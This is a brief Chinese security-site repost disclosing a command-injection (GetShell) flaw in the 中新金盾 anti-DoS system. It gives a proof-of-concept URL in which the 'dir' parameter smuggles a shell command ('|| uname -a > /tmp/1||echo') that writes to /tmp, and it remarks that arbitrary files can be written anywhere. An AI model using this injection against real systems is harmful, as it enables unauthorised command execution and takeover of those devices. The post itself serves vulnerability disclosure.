中新金盾抗拒绝服务系统GetShell漏洞2 没穿底裤 714文章 0评论 2020年1月1日05:46:41评论627 views字数 156阅读0分31秒阅读模式 摘要漏洞证明: https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo 漏洞作者: Tea 漏洞证明: https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo 命令: uname -a > /tmp/1 写入到/tmp/1文件 可以写任意文件到任意目录,还愁啥? 点赞 http://cn-sec.com/archives/75657.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论